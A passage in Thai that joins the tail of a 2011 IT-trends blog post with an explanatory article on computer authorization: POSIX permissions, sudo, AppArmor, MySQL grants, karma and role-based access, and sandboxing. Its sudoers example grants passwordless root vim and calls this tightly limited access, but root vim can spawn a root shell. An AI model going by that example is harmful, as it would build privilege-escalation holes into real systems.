ออกใบอนุญาต ทำให้ "จังหวะ" การเดินก้าวตาม Android ไม่ทัน เราจะเจอปัญหา "จังหวะและพรมแดนไม่ซิงก์กัน" มากขึ้นเรื่อยๆ เมื่อเราต้องพึ่งพิงบริการไอทีจากต่างประเทศ (โดยเฉพาะสหรัฐ) มากขึ้นทุกวัน แต่จิ๊กซอส่วนประกอบอื่นๆ กลับติดขัดปัญหาในด้านอื่นๆ ที่ไม่ใช่เรื่องไอที ตรงนี้เป็นทั้งอุปสรรคและโอกาส คนที่มองเห็นช่องว่างเหล่านี้ ก็มีสิทธิ์ประสบความสำเร็จจากการสร้างบริการสอดแทรกเข้ามาได้ (แต่ด้วยปัจจัยจากข้อ 7 และ 8 ก็อาจจะทำได้ลำบากอยู่บ้าง) ### 10\. อุปกรณ์ใหม่ พฤติกรรมการใช้งานแบบใหม่ ปัญหาสังคมแบบใหม่ เป็นเรื่องปกติของสังคม เมื่อเจอวิธีการทำงาน วิธีการปฏิสัมพันธ์ระหว่างกันแบบใหม่ๆ ก็จะเจอปัญหาใหม่ตามมา เราเคยเจอกรณีลักษระนี้มาแล้วจาก IRC และ Camfrog ก็ไม่น่าแปลกใจอะไรที่จะเจอกับ Facebook, Foursquare หรือ FaceTime อีก ปัญหาทางสังคมชุดใหม่ๆ ก็จะครอบคลุมทุกโดเมน ไม่ว่าจะเป็นการเสพติดเทคโนโลยี (โฆษณา Disconnect to Connect ของดีแทค) ช่องว่างดิจิทัลที่ถ่างขึ้นเรื่อยๆ (คนกลุ่มนึงมี iPhone 4 รุ่นล่าสุด ในขณะที่คนที่เข้าไม่ถึงก็ยังเข้าไม่ถึงเหมือนเดิม) การรู้เท่าทันเทคโนโลยี (คนส่วนหนึ่งทวีตแบบติดพิกัดโดยไม่รู้ตัว) การควบคุมและเซ็นเซอร์โดยรัฐ (อันนี้คงไม่ต้องอธิบายมั้ง) ความเป็นส่วนตัว (คลิปหลุดทั้งหลาย) ฯลฯ ผมคงไม่ต้องลงรายละเอียดตรงนี้มากเดี๋ยวจะเบื่อกันหมด แต่ข้อสรุปก็คือเราต้องเตรียมรับมือปัญหาเหล่านี้ ถ้าหากต้องการให้อุตสาหกรรมไอทีก้าวต่อไปในสังคมไทยที่ "คิดอะไรไม่ออกก็โทษเทคโนโลยี" ### สรุป ด้านเทคโนโลยีไม่ใช่ปัญหา เราใช้เทคโนโลยีเดียวกับโลก แต่ด้านอื่นๆ ของเราอาจก้าวตามไม่ทันโลก สรุปปัญหาที่พอมองเห็นและพยากรณ์ได้อีกรอบ - อุปกรณ์ใหม่ๆ มากมาย คำถามคือจะใช้อะไร ควรเลือกข้างไหน มีวิธีไหนให้มันทำงานร่วมกันได้บ้าง - ข้อมูลจะไปอยู่บนเน็ตหมด สร้างอำนาจต่อรองให้กับคนดูแลข้อมูล และคนคุมท่อส่งข้อมูล - การผูกขาดด้วยขนาดของผู้ให้บริการไอทีรายใหญ่จากต่างประเทศ จนผู้ให้บริการในประเทศแข่งขันไม่ได้ - ปัญหาเรื่องพรมแดนหรือพื้นที่การให้บริการ ที่อาจมาไม่ถึงเมืองไทย - ระบบการจ่ายเงินที่ยังไม่พัฒนา - วิธีการป้อนข้อมูลภาษาไทยบนอุปกรณ์ชนิดใหม่ๆ ที่ต้องวิ่งตามแก้ไขกันอีกแล้ว - ปัญหาทางสังคมที่จะเกิดขึ้นจากปฏิสัมพันธ์กับอุปกรณ์หรือบริการแบบใหม่ๆ สวัสดีปีใหม่ 2011 และยินดีต้อนรับเข้าสู่ "ประวัติศาสตร์บทใหม่ของโลกไอที" ครับ
# Authorization: เป็นได้แค่..… กระบวนการรักษาความปลอดภัยในระบบคอมพิวเตอร์ที่สำคัญอีกอย่างหนึ่งคือการให้อำนาจ (Authorization) กระบวนการนี้เมื่อเทียบกับชีวิตประจำวันคือการที่เราเข้าถึงพื้นที่ในอาคารต่างๆ ได้จำกัด หลังร้านอาหารอาจจะจำกัดเฉพาะพนักงานเข้าได้เท่านั้นขณะที่ลูกค้าทั่วไปจะต้องอยู่ในบริเวณที่นั่งที่จัดไว้ หรือบริเวณชั้นผู้บริหารที่พนักงานทั่วไปไม่สามารถเข้าใช้งานได้ ### จำกัดทางภายภาพ: เข้าถึงไม่ได้ตั้งแต่ภายนอก การให้อำนาจในระบบคอมพิวเตอร์อาจจะเป็นการจำกัดการเข้าถึงคอมพิวเตอร์ตั้งแต่แรก คอมพิวเตอร์ในยุคแรกมี "กุญแจ" ที่ใช้ล็อกเครื่อง หากกุญแจไม่ปลดล็อกจะไม่สามารถบูตเครื่องขึ้นมาใช้งานได้ แม้ว่าประสิทธิภาพของกระบวนการนี้จะมีจำกัด เพราะในความเป็นจริงกุญแจเป็นเพียงสวิตซ์บนเมนบอร์ดเท่านั้น หากผู้บุกรุกสามารถเข้าถึงตัวเครื่องได้ก็สามารถปลดล็อกด้วยการถอดสวิตซ์เหล่านี้ออกได้โดยง่าย ทุกวันนี้เซิร์ฟเวอร์หลายรุ่นเองที่ตัวเครื่องก็มักจะมี "สวิตซ์" เอาไว้ หากตัวถังเครื่องถูกเปิดขึ้นเมื่อใด เครื่องก็จะร้องเตือนเมื่อบูตครั้งต่อไป และต้องปิดเสียงร้องด้วยสิทธิผู้ดูแลระบบ เพื่อป้องกันการเปลี่ยนแปลงฮาร์ดแวร์ภายในเครื่อง กระบวนการที่มีประสิทธิภาพกว่าคือการให้อำนาจการเข้าถึงตัวเครื่องคอมพิวเตอร์ตั้งแต่ทีแรก เราเห็นในภาพยนตร์เรื่อง Mission Impossible ภาคแรกที่มีกระบวนการตรวจสอบอย่างหนาแน่น เพื่อที่จะเข้าถึงตัวคอมพิวเตอร์ได้ ระบบคอมพิวเตอร์ยุคใหม่ที่เน้นการทำงานผ่านระบบเครือข่ายทั้งภายในองค์กรหรือเครือข่ายอินเทอร์เน็ตไม่สามารถพึ่งพิงการให้อำนาจทางกายภาพเพียงอย่างเดียวอีกต่อไป แต่อย่างไรก็ตาม ระบบให้อำนาจส่วนมากกลับถูกข้ามได้โดยง่ายหากผู้บุกรุกสามารถเข้าถึงเครื่องโดยตรงได้ ศูนย์ข้อมูลที่ใช้เก็บเซิร์ฟเวอร์ส่วนมากจึงมักมีนโยบายป้องกันทางกายภาพอย่างแน่นหนา นับแต่การปิดบังที่ตั้งศูนย์ข้อมูลที่อาคารมักกลมกลืนไปกับอาคารอื่นๆ โดยไม่มีการระบุโดยตรงว่าเป็นศูนย์ข้อมูล และเมื่อเข้าไปภายในแล้วก็ยังมีการตรวจสอบสิทธิหลายขั้นตอน มาตรการป้องกันของศูนย์ข้อมูลทั่วไปยังรวมถึงการตรวจสอบหลายชั้น ศูนย์ข้อมูลบางแห่งเมื่อเข้าไปแล้วผู้ที่เข้าไปจะถูกบังคับให้อยู่ในห้องขนาดเล็กเพื่อชั่งน้ำหนักขณะเข้าและออก เพื่อรับประกันว่าจะไม่มีการนำอุปกรณ์ใดๆ ออกไปจากศูนย์ข้อมูล ศูนย์ข้อมูลของกูเกิลที่เปิดเผยข้อมูลออกมาระบุว่าไม่อนุญาตให้ฮาร์ดดิสก์กลับออกมาจากศูนย์ข้อมูลได้เพื่อความปลอดภัย โดยจะ "บดทำลาย" ก่อนส่งออกมาจากศูนย์ข้อมูลเป็นเศษเหล็กเท่านั้น ### เข้าไม่ได้แม้อยู่กับเราเอง กระบวนการจำกัดการเข้าถึงทางกายภาพยังมีอีกแนวทางหนึ่งนอกจากการให้อำนาจไม่ให้คนที่ไม่มีสิทธิ์เข้าถึงคอมพิวเตอร์หรือข้อมูล แต่ในทางกลับกัน หากเราต้องการให้คนที่ไม่มีสิทธิ์นั้นเป็นผู้ครอบครองคอมพิวเตอร์นั้นไว้ตลอดเวลาแต่ไม่ต้องการให้เขาอ่านข้อมูลเหล่านั้นได้ หรือเข้าถึงข้อมูลเหล่านั้นโดยตรง กระบวนการให้อำนาจการเข้าถึงข้อมูลโดยตรงเกิดขึ้นตลอดเวลา ตัวอย่างสำคัญ คือ ซิมการ์ดโทรศัพท์มือถือที่ผู้ให้บริการโทรศัพท์มือถือไม่ต้องการให้เราสามารถอ่านข้อมูลภายในโดยตรงแต่กลับต้องการให้เราถือครองตัวซิมการ์ดเอาไว้ หากเราสามารถรู้ความลับภายในซิมการ์ดได้ก็ถือเป็นรูรั่วของระบบรักษาความปลอดภัยอย่างหนึ่ง (เคยเกิดขึ้นในการ์ด GSM รุ่นแรกๆ) หรือสมาร์ตการ์ดเช่นบัตรเครดิตที่ภายในมีกุญแจลับที่ธนาคารผู้ออกบัตรไม่ต้องการให้ผู้ใช้บัตรสามารถอ่านกุญแจนั้นออกมาได้เพราะจะทำให้สามารถสำเนาการ์ดไปใช้งานได้ การให้อำนาจไม่ให้ผู้ถือข้อมูลสามารถอ่านข้อมูลได้เองทำได้ด้วยการป้องกันไม่ให้ผู้ใช้เข้าอ่านข้อมูลโดยตรงได้ แต่ต้องอ่านผ่าน "คอมพิวเตอร์" ที่รันซอฟต์แวร์ที่เท่านั้น ในกรณีของซิมการ์ด เนื่องจากการ์ดมีขนาดเล็กมาก ตัวสมาร์ตการ์ดเองเป็นเพียงชิปเดี่ยวที่มีซีพียู, แรม, และพื้นที่เก็บข้อมูลถาวร (non-volatile) อยู่ภายใน ชิปขนาดเล็กมากนี้โดยทั่วไปแล้วหากต้องการเชื่อมต่อวงจรเพื่ออ่านหน่วยความจำภายในโดยตรงต้องใช้เครื่องมือความละเอียดสูง ราคาแพง ทำให้เราสามารถอ่านข้อมูลภายในออกมาได้ อย่างไรก็ดีในปี 1999 ทีมวิจัยจากบริษัท Advanced Digital Security Research ร่วมกับห้องแล็บจากมหาวิทยาลัยเคมบริดจ์ก็สาธิตกระบวนการถอดแยกวงจรรวมออกมาเป็นส่วนๆ ทำให้สามารถอ่านค่าใน ROM ที่เป็นตัวเฟิร์มแวร์ของการ์ดออกมาได้ แม้กระบวนการอ่านข้อมูลในแรมจะทำได้ยากกว่าเพราะไม่สามารถอ่านจากลายวงจรได้โดยตรง การป้องกันข้อมูลจากผู้ครอบครองมี เช่น เครื่องเกมคอนโซลทุกวันนี้ล้วนมีเฟิร์มแวร์ภายในเพื่อยืนยันซอฟต์แวร์อื่นๆ (อ่านเพิ่มเติมตอน [Authentication](https://www.blognone.com/node/52143)) ความท้าทายสำคัญคือเฟิร์มแวร์ที่ใช้ยืนยันซอฟต์แวร์อื่นนั้นต้องไม่สามารถอ่านได้โดยผู้ใช้ทั่วไป เพื่อป้องกันการปลอมแปลงเฟิร์มแวร์นี้ ในสมัย Xbox นั้นวางเฟิร์มแวร์นี้ไว้ใน Northbridge ที่เชื่อมต่อกับซีพียูด้วยบัสสัญญาณนาฬิกา 700MHz โดยคาดว่าผู้ใช้ทั่วไปจะไม่มีเครื่องจับสัญญาณประสิทธิภาพสูงเช่นนี้ ทำให้ไม่สามารถอ่านเฟิร์มแวร์ออกไปได้ แต่ทีมวิจัยตามมหาวิทยาลัยก็ใช้เครื่องมือประสิทธิภาพสูงดักเฟิร์มแวร์ที่อ่านระหว่างบูตเครื่องแล้วปล่อยให้ดาวน์โหลดจนมีคนพบช่องโหว่มากมายในภายหลัง และ Xbox ก็ถูกแฮกจากช่องโหว่เหล่านั้นในเวลาต่อมา ### POSIX: อ่าน, เขียน, รัน, ตัวเอง, พวกเราเอง, และใครก็ได้ เมื่อระบบคอมพิวเตอร์เมื่อพัฒนาไป แนวทางการใช้งานสำคัญคือการใช้งานร่วมกันระหว่างผู้ใช้จำนวนหลายๆ คน หากคอมพิวเตอร์ไม่มีระบบการให้อำนาจก็จะเปิดให้ผู้ใช้แต่ละคนเข้าไปอ่านและเขียนไฟล์ของผู้ใช้คนอื่นๆ ได้อย่างเสรี จึงเริ่มมีการพัฒนาการให้อำนาจของผู้ใช้ สิทธิของผู้ใช้รูปแบบหนึ่งที่ได้รับความนิยมอย่างสูงทั่วโลก คือ สิทธิการเข้าถึงไฟล์คล้ายระบบยูนิกซ์ (Unix-like) โดยภายหลังผู้ผลิตยูนิกซ์หลายรายได้รวมตัวกันสร้างเป็นมาตรฐานกลางที่ชื่อว่า POSIX ขึ้นมาแทนที่ ระบบให้อำนาจนี้ระบุให้ทุกไฟล์และทุกโฟลเดอร์ในเครื่องจะต้องมีตัวเลขกำหนดสิทธิ์ไว้สามชุด สำหรับผู้ใช้ที่เป็นเจ้าของไฟล์, ผู้ใช้ที่เป็นกลุ่มเดียวกับเจ้าของไฟล์, และผู้ใช้ทุกคนในเครื่อง โดยแต่ละไฟล์จะต้องมีชื่อเจ้าของไฟล์ และกลุ่มผู้ใช้เจ้าของไฟล์กำกับอยู่เสมอ ตัวเลขสามชุดของ POSIX นั้นแทนด้วยตัวอักษรได้แก่ สิทธิอ่านไฟล์ (read - r), สิทธิเขียนไฟล์ (write - w), และสิทธิรันไฟล์ (execute - x) เมื่อนำมาเรียงกันเป็นกลุ่มก็ได้สิทธิของแต่ละกลุ่มเช่น `rwxrw-r--` เช่นนี้คือเจ้าของไฟล์สามารถรันไฟล์ อ่านไฟล์ หรือเขียนไฟล์ได้ กลุ่มผู้ใช้เจ้าของไฟล์ที่ระบุไว้จะสามารถอ่านและเขียนได้แต่รันไม่ได้ และผู้ใช้อื่นๆ ในระบบจะอ่านได้อย่างเดียวเท่านั้น ในกรณีที่เป็นโฟลเดอร์ หากไม่มีสิทธิรันไฟล์ จะแปลว่าไม่สามารถเข้าไปยังโฟลเดอร์นั้นได้ ระบบในช่วงหลังมักแยกผู้ใช้ออกเป็นคนๆ โดยไม่มีการแชร์กันระหว่างกลุ่มมากนัก เมื่อติดตั้งลินุกซ์ปกติเมื่อเราสร้างผู้ใช้ใหม่ ระบบติดตั้งมักสร้างกลุ่มผู้ใช้ชื่อเดียวกับชื่อผู้ใช้ขึ้นมาด้วย ทำให้การแชร์โดยทั่วไปจะเป็นการกำหนดไฟล์ของเราเองและไฟล์สำหรับผู้อื่น ระบบไฟล์สมัยใหม่มักมีกระบวนการควบคุมการเข้าใช้งานซับซ้อนกว่า POSIX มาก เช่น NTFS ของวินโดวส์นั้นสามารถให้สิทธิในการเขียนต่อท้ายไฟล์ (append) โดยไม่เข้าไปแก้เนื้อหาที่เขียนไปแล้วได้ กระบวนการให้สิทธิตามผู้ใช้เช่นนี้เรียกว่า discretionary access control (DAC) แม้จะใช้งานได้ดีแต่ยังมีปัญหาบางครั้งผู้ใช้ตั้งสิทธิอย่างละเลย เช่น เก็บกุญแจลับ (private key) เอาไว้ในไฟล์ที่ผู้ใช้ทุกคนในเครื่องเข้าถึงได้ ความละเลยนี้ทำให้ข้อมูลของผู้ใช้รั่วไหลได้โดยง่าย ### sudo: ทำแทนกัน ระบบการจัดการสิทธิแบบหนึ่งที่นิยมใช้งานในลินุกซ์ช่วงหลังคือ sudo ซึ่งเป็นคำสั่งที่เปิดให้ผู้ใช้ในระบบลินุกซ์คนหนึ่งๆ สามารถสั่งคำสั่งโดยเหมือนกับสั่งแทนผู้ใช้คนอื่นในระบบได้ โดยคำสั่งสำคัญส่วนมากเป็นคำสั่งที่ต้องการสิทธิ root เช่น การสั่งเพิ่มหรือถอนดิสก์ หรือการเข้าถึงไฟล์ที่ปกติไม่มีสิทธิเข้าถึง คำสั่ง sudo ทำให้ผู้ดูแลระบบสามารถกำหนดคำสั่งที่ผู้ใช้คนหนึ่งๆ จะรันแทนผู้ใช้คนอื่นๆ ได้อย่างละเอียด เช่น ผู้ใช้คนหนึ่งอาจจะมีสิทธิดูแลเว็บเซิร์ฟเวอร์ ผู้ดูแลระบบอาจจะกำหนดให้ผู้ใช้คนนั้นสามารถรันสคริปต์เพื่อหยุดเว็บเซิร์ฟเวอร์ และเริ่มการทำงานเว็บเซิร์ฟเวอร์ รวมถึงเข้าแก้ไขไฟล์คอนฟิกของเว็บเซิร์ฟเวอร์ได้โดยใช้สิทธิ root ผู้ใช้ที่สามารถ sudo เข้ามารันคำสั่งเหล่านั้นได้ จะไม่สามารถรันคำสั่งอื่นๆ ได้ ทำให้สิทธิถูกจำกัดไว้อย่างละเอียด myuser ALL = (root) NOPASSWD: /usr/bin/vim youruser ALL = (root) /usr/bin/vim ตัวอย่างการกำหนดสิทธิในระบบ sudo ข้างต้น เปิดให้ผู้ใช้ชื่อ myuser สามารถรันคำสั่ง vim เสมือนผู้ใช้ root เป็นผู้รัน โดยไม่ต้องถามรหัสผ่านซ้ำ เพียงแค่รันคำสั่ง sudo vim เท่านั้น ขณะที่ผู้ใช้ youruser จะเมื่อต้องการรันคำสั่ง vim ด้วยสิทธิ root ด้วยคำสั่งแบบเดียวกันจะถูกถามรหัสผ่านของ youruser เองเพื่อยืนยันซ้ำอีกครั้งก่อนจะให้รันในสิทธิ root กระบวนการนี้ทำให้การให้อำนาจสามารถทำได้อย่างละเอียด หากมีคำสั่งซับซ้อนเราสามารถเขียนสคริปต์เพื่อรันคำสั่งทั้งหมดไว้ในสคริปต์เดียวแล้วเปิดสิทธิให้ผู้อื่นเข้าใช้งาน ### Mandatory Access Control: โปรดฟังอีกครั้งหนึ่ง กระบวนการ DAC มีช่องโหว่ที่ความปลอดภัยไม่ดีไปกว่าความปลอดภัยที่ผู้ใช้เจ้าของไฟล์จะดูแลข้อมูลของตัวเอง รวมถึงแอพพลิเคชั่นเองที่บางครั้งมีช่องโหว่อาจจะถูกโจมตีจากภายนอกและเข้าไปเปลี่ยนระบบในส่วนที่ไม่เกี่ยวข้องได้ ตัวอย่างที่พบบ่อยเช่น เว็บเซิร์ฟเวอร์ไม่ว่าจะรันโดยผู้ใช้คนใดก็ตาม (รวมถึง root) ก็ไม่ควรเข้าไปแก้ข้อมูลของผู้ใช้ คนอื่นๆ ในระบบ การเปิดพอร์ตเชื่อมต่อไปยังภายนอกควรเชื่อมต่อเฉพาะ mysql ที่อยู่เซิร์ฟเวอร์อีกตัวหนึ่งเท่านั้น ขณะที่การโจมตีเว็บเซิร์ฟเวอร์บ่อยครั้งจะสร้างพรอกซี่ออกไปยังเซิร์ฟเวอร์อื่นๆ เพื่อซ่อนตัวแฮกเกอร์ ระบบปฎิบัติการสมัยใหม่มีการควบคุมที่มากกว่า DAC ขึ้นไปอีกขั้น โดยกำหนดสิทธิเฉพาะสำหรับแต่ละแอพพลิเคชั่นอย่างละเอียด เช่น เว็บเซิร์ฟเวอร์จะอ่านไฟล์ได้จาก `/var/www/` เท่านั้นโดยไม่สามารถอ่านไฟล์จากโฟลเดอร์อื่นๆ ได้ เมื่อโค้ด php ที่รันอยู่ภายใต้เว็บเซิร์ฟเวอร์พยายามอ่านไฟล์จากโฟลเดอร์อื่นๆ ก็จะผิดพลาดและเตือนว่า access denied ระบบควบคุมเพิ่มเติมนี้เรียกว่า mandatory access control (MAC) ระบบปฎิบัติการรุ่นใหม่ๆ เช่น ลินุกซ์ และวินโดวส์ ล้วนรองรับระบบเช่นนี้ทั้งสิ้น ในลินุกซ์นั้นระบบควบคุมเข่นนี้มีสองระบบที่ได้รับความนิยม ได้แก่ SELinux ที่เป็นโครงการวิจัยของ NSA (!!!!) และ AppArmor ที่ฝั่ง Ubuntu เลือกใช้งาน ขณะที่วินโดวส์เองตั้งแต่ Vista เป็นต้นมาก็มีระบบแบบเดียวกันนี้เช่นกันในชื่อว่า Mandatory Integrity Control (MIC) #include /usr/sbin/tcpdump { #include #include #include capability net_raw, capability setuid, capability setgid, capability dac_override, network raw, network packet, # for -D capability sys_module, @{PROC}/bus/usb/ r, @{PROC}/bus/usb/** r, # for -F and -w audit deny @{HOME}/.* mrwkl, audit deny @{HOME}/.*/ rw, audit deny @{HOME}/.*/** mrwkl, audit deny @{HOME}/bin/ rw, audit deny @{HOME}/bin/** mrwkl, @{HOME}/ r, @{HOME}/** rw, /usr/sbin/tcpdump r, } ตัวอย่างคอนฟิกของ AppArmor สำหรับโปรแกรม tcpdump ซึ่งใช้ดักจับข้อมูลในเครือข่าย มีการตั้งให้ tcpdump สามารถเข้าถึงเครือข่ายในแบบ raw ได้ซึ่งเป็นความสามารถปกติของซอฟต์แวร์ดักจับข้อมูลประเภทนี้ แต่ที่น่าสนใจ ในบรรทัดที่ขึ้นต้นด้วย audit ในช่วงล่าง เช่น `audit deny @{HOME}/bin/ rw,` กำหนดว่า tcpdump นั้น แม้จะสามารถเขียนไฟล์ได้ทุกที่ แต่ไม่สามารถเขียนไฟล์ในโฟลเดอร์ที่ชื่อ bin ใน home directory ของผู้ใช้ แม้เราจะสั่งด้วยสิทธิ root เช่น `sudo tcpdump -i eth0 -w /home/myuser/bin/out.pcap` เช่นนี้ซอฟต์แวร์ก็ยังคงแจ้งความผิดพลาดว่า Permission denied อยู่ดี เพราะ AppArmor ป้องกันเอาไว้อีกชั้นหนึ่งนอกจากสิทธิในการเขียนอ่านไฟล์ตามระบบ DAC ทั่วไป ระบบ SELinux จะคล้ายกับ AppArmor พอสมควรแต่กระบวนการคอนฟิกจะซับซ้อนกว่ามาก จนถึงขั้นที่ว่าหากค้นหาข้อมูลเกี่ยวกับ SELinux แล้ว กูเกิลจะแนะนำหน้าเพจ "วิธีการปิด SELinux" อยู่ในหน้าแรกของผลค้นหาเสมอๆ ขณะที่ MIC ของวินโดวส์นั้นจะแบ่งระดับของความน่าเชื่อถือของซอฟต์แวร์เอาไว้สี่ระดับ ในกรณีของ Internet Explorer หากผู้ใช้เปิดเว็บที่ไม่อยู่ในรายการเว็บที่น่าเชื่อถือก็จะจัดลำดับให้อยู่ระดับต่ำสุด ทำให้ตัวโพรเซสของหน้านั้นๆ ไม่สามารถอ่านเขียนไฟล์ในระบบได้โดยตรง ### ฐานข้อมูล ทุกวันนี้เมื่อเราใช้ระบบฐานข้อมูล เช่น MySQL นั้น เรามักใช้ผ่านเว็บ หรือบริการอื่นๆ มากกว่าจะเชื่อมต่อเข้ากับตัวฐานข้อมูลโดยตรง ทำให้มักไม่มีการจัดการสิทธิอะไรซับซ้อนนัก โดยเราอาจจะสร้างผู้ใช้ที่ดูแลฐานข้อมูลแต่ละฐานข้อมูล แยกออกจากผู้ดูแลเครื่องหรือระบบฐานข้อมูลทั้งหมด ในกรณีของ MySQL เมื่อเราสร้างฐานข้อมูลใหม่ ด้วยคำสั่ง เช่น `CREATE DATABASE example;` แล้ว คำสั่งที่ตามมาเสมอในทุกวันนี้คือการสร้างผู้ใช้ขึ้นมาทำ "ทุกอย่าง" บนฐานข้อมูลนั้นได้ ด้วยคำสั่ง `GRANT ALL ON example.* TO 'example_user'@'localhost' IDENTIFIED BY 'example_password;` กระบวนการนี้ทำให้ผู้ใช้ที่ดูแลฐานข้อมูลแต่ละฐานข้อมูลถูกแยกออกจากกันอย่างอิสระ ผู้ดูแลฐานข้อมูลแต่ละชุดไม่สามารถข้ามไปแก้ไขดัดแปลงข้อมูลบนฐานข้อมูลอื่นๆ ได้ นอกจากนี้เรายังสามารถกำหนดอำนาจเฉพาะบางอย่าง เช่น ผู้ใช้คนหนึ่งๆ อาจจะทำได้เพียงดูข้อมูลเท่านั้น แต่ไม่สามารถแก้ไขได้ ก็ทำได้ด้วยคำสั่ง `GRANT SELECT ON example.user_table TO 'example_user'@'localhost';` กรณีนี้ผู้ใช้ example\_user ก็จะเข้าไปดูข้อมูลในตาราง user\_table ได้เพียงเท่านั้น ไม่สามารถดูข้อมูลอื่นได้ และไม่สามารถแก้ไขข้อมูลใดๆ ได้ ### Karma-based: ทำได้ตามกรรมที่ทำมา แนวทางการกำหนดสิทธิแบบหนึ่งที่เราพบกันคือการกำหนดตาม "กรรม" (karma) เว็บกลุ่มหนึ่งมักใช้แนวทางนี้ ด้วยการเพิ่มสิทธิให้ผู้ใช้เมื่อมีส่วนร่วมกับเว็บตามที่กำหนดไว้ เว็บบอร์ดหนึ่งๆ อาจจะเปิดให้ผู้ที่ใช้เว็บบอร์ดอย่างต่อเนื่องสามารถลบกระทู้ หรือล็อกไม่ให้ผู้อื่นเข้ามาใช้งานต่อไปได้ ในสมัยหนึ่งแล้ว ระบบจัดการเนื้อหา (content management system - CMS) สองสายคือ Drupal และ Wordpress นั้นมีความต่างกันคือ Wordpress นั้นเลือกใช้ระบบการให้อำนาจแบบกรรมนี้ ทุกวันนี้เว็บที่กำหนดสิทธิ์ระบบกรรมนี้คือ Stack Overflow ที่กำหนดคะแนนผู้ใช้เป็นค่า reputation เมื่อผู้ใช้ทำกิจกรรมต่างๆ ในเว็บตามเงื่อนไข ก็จะได้คะแนนเพิ่มขึ้นเรื่อยๆ พร้อมกับสิทธิต่างๆ เช่น การโหวตกระทู้หรือคำตอบให้คะแนนติดลบจะต้องมีคะแนนสูงกว่าการให้คะแนนบวก การแก้ไขคำถามหรือคำตอบของผู้ใช้อื่น ### Role-based: ต่างคน ต่างบทบาท แม้ว่าเว็บในยุคแรกจะนิยมการให้สิทธิในระบบกรรมกันมาก แต่เว็บจำนวนมากมีผู้ใช้ที่สิทธิต่างกันออกไป เช่น ผู้ใช้ที่ได้รับอนุญาตให้ลบความเห็นอาจจะเป็นพนักงานโดยตรงที่มีสิทธิพิเศษทั้งที่ไม่ได้มีส่วนร่วมกับเว็บมากมายอะไร กระบวนการให้สิทธิตามบทบาท (role-based) จึงเหมาะกับการจัดการมากกว่า กระบวนการให้อำนาจตามบทบาทแบ่งออกเป็นสามส่วนได้แก่ 1. **สิทธิต่างๆ ในระบบ**: ระบบจะต้องกำหนดสิทธิเอาไว้อย่างละเอียดเป็นต้นว่า สิทธิในการแก้ไขโพสของตัวเอง, สิทธิในการคอมเมนต์, สิทธิในการอ่านโพส, สิทธิการคอมเมนต์, หรือสิทธิในการลบคอมเมนต์ 2. **สิทธิของแต่ละบทบาท**: แต่ละบทบาทจะมีชุดของสิทธิที่กำหนดไว้ล่วงหน้า เช่น ผู้ดูแลความเห็นอาจจะมีสิทธิลบความเห็นผู้อื่น แต่ไม่มีสิทธิแก้ไขความเห็นของใครเลย หรือสิทธิผู้ดูแลระบบที่สามารถทำได้ทุกอย่าง สิทธิของผู้ดูแลโฆษณาที่สามารถเข้าจัดการกับโฆษณาของเว็บได้ 3. **บทบาทของผู้ใช้แต่ละคน**: ผู้ใช้แต่ละคนจะสามารถมีได้หลายบทบาทพร้อมกัน ผู้ใช้คนหนึ่งอาจจะเป็นผู้ใช้ทั่วไปที่มีสิทธิ์โพสความเห็น แก้ไขความเห็นของตัวเอง และลบความเห็นของตัวเองได้ ขณะเดียวกันเขาอาจจะมีบทบาทผู้ดูแลความเห็น (moderator) ทำให้สามารถลบความเห็นของผู้ใช้คนอื่นๆ ไปด้วย กระบวนการจัดการสิทธิอย่างพื้นฐานนั้น คือ เมื่อผู้ใช้มีบทบาทมากขึ้น สิทธิที่ได้ตามบทบาทก็จะเพิ่มเติมไปเรื่อยๆ ด้วยเช่นกัน จนบางครั้งการเพิ่มบทบาทอาจจะไม่ได้เพิ่มสิทธิ์ใหม่ๆ แล้ว ในระบบที่ซับซ้อนขึ้น บางระบบอาจจะมีบทบาทบางอย่างที่ห้ามมีสิทธิบางสิทธิ แม้จะมีบทบาทอื่นๆ ให้สิทธิมาก็ตามที ระบบที่ซับซ้อนเช่นนั้นจะต้องมีการจัดการถึงลำดับความสำคัญ กระบวนการนี้ซับซ้อนและแตกต่างกันไปในแต่ละระบบ นอกจากระบบจัดการเว็บเนื้อหาที่ยกตัวอย่างมาแล้ว ระบบอื่นๆ อีกหลายอย่างก็ใช้กระบวนการจัดการสิทธิในแบบเดียวกัน วินโดวส์เป็นระบบปฎิบัติการที่ใช้การจัดการสิทธิตามบทบาทอีกตัวหนึ่ง ผู้ใช้ที่มีบทบาทเป็นผู้สำรองข้อมูลอาจจะมีสิทธิอ่านไฟล์ทำทุกไฟล์ในระบบแต่ไม่มีสิทธิเขียนหรือลบไฟล์ใดๆ ### Sandbox: เล่นได้ เลอะได้ แต่ไม่เดือดร้อนคนอื่น ระบบการจัดการสิทธิที่เรากล่าวมาทั้งหมดเป็นระบบเพื่อจัดการกับผู้ใช้ ไม่ให้เข้าถึงข้อมูล หรือบริการบางอย่างได้ แต่ในการใช้งานจริง การให้อำนาจอีกรูปแบบหนึ่งที่เราใช้งานกันอยู่เสมอ คือการให้อำนาจของซอฟต์แวร์ที่มารันบนเครื่องคอมพิวเตอร์ของเราเอง ขณะที่ระบบปฎิบัติการมีกระบวนการยืนยันซอฟต์แวร์ (กล่าวถึงใน[บท Authentication](https://www.blognone.com/node/52143)) แต่การปล่อยให้ซอฟต์แวร์สามารถทำงานได้โดยไม่มีการควบคุมก็เปิดช่องให้ถูกโจมตีได้ง่าย บางครั้งซอฟต์แวร์ที่ไม่มีอันตรายใดๆ แต่กลับได้รับอินพุตที่มุ่งร้ายก็อาจจะทำให้กลายเป็นช่องโหว่ระบบไปได้ ตัวอย่างที่เราพบกันบ่อยครั้งอาจจะเป็นมัลแวร์ที่แพร่ผ่านไมโครซอฟท์เวิร์ด เพราะเวิร์ดเองรองรับสคริปต์ภายในไฟล์ การติดตั้งซอฟต์แวร์อาจจะยืนยันความถูกต้องและความน่าเชื่อถือของซอฟต์แวร์ได้ แต่การรับส่งข้อมูลเพื่อใช้งานจริงๆ นั้นเรากลับไม่สามารถตรวจสอบและรับเฉพาะข้อมูลที่น่าเชื่อถือได้เสมอไป ตัวอย่างของการที่เราต้องรันโค้ดที่อาจจะไม่น่าเชื่อถือ คือ เว็บ ทุกวันนี้เมื่อเราเปิดเว็บขึ้นมาจะมีโค้ดจำนวนมากรันอยู่บนเครื่องของเรา เพื่อตอบโต้กับเซิร์ฟเวอร์ในรูปแบบต่างๆ ขณะที่เว็บรุ่นใหม่ๆ มีความสามารถในการอ่านไฟล์, เขียนไฟล์, ดึงภาพจากกล้อง, อัดเสียงจากไมโครโฟน ฯลฯ 